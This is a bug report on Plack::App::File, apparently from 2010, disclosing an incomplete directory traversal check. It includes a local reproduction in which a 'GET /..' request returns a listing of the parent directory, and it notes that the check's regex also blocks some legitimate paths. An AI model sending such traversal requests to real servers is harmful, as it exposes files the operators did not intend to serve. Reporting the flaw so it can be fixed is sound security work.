| Subject: | Directory traversal check incomplete |
The directory traversal check in Plack::App::File still lets you list
files in the parent directory. I'm not sure of the severity, it looks
like it's probably just information disclosure but maybe someone who
spends a bit more time can figure out a way to leverage it.
Expected behaviour is a 403, actual behaviour is a listing with the
contents of the parent directory.
$ mkdir -p /tmp/test/in_parent_dir /tmp/test/child /tmp/test/child/childdir
$ cd /tmp/test/child
$ /opt/perl/bin/plackup -MPlack::App::Directory -e
'Plack::App::Directory->new'
HTTP::Server::PSGI: Accepting connections at http://0:5000/
127.0.0.1 - - [16/Nov/2010 04:54:39] "GET /.. HTTP/1.0" 200 1503 "-" "-"
$ telnet localhost 5000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /.. HTTP/1.0
HTTP/1.0 200 OK
<snipped>
<tr><td class='name'><a href='../'>Parent Directory</a></td><td
class='size'></td><td class='type'></td><td class='mtime'></td></tr>
<tr><td class='name'><a href='/../.'>./</a></td><td
class='size'>4096</td><td class='type'>directory</td><td
class='mtime'>Tue, 16 Nov 2010 05:01:36 GMT</td></tr>
<tr><td class='name'><a href='/../..'>../</a></td><td
class='size'>4096</td><td class='type'>directory</td><td
class='mtime'>Tue, 16 Nov 2010 04:53:43 GMT</td></tr>
<tr><td class='name'><a href='/../child'>child/</a></td><td
class='size'>4096</td><td class='type'>directory</td><td
class='mtime'>Tue, 16 Nov 2010 05:01:36 GMT</td></tr>
<tr><td class='name'><a
href='/../in_parent_dir'>in_parent_dir/</a></td><td
class='size'>4096</td><td class='type'>directory</td><td
class='mtime'>Tue, 16 Nov 2010 04:53:43 GMT</td></tr>
Relevant line is 43 of Plack::App::File.
The regex is also overly broad, it will reject legitimate paths with ../
in them, for example http://example.com/blog/Some_Title_That_Ends_In../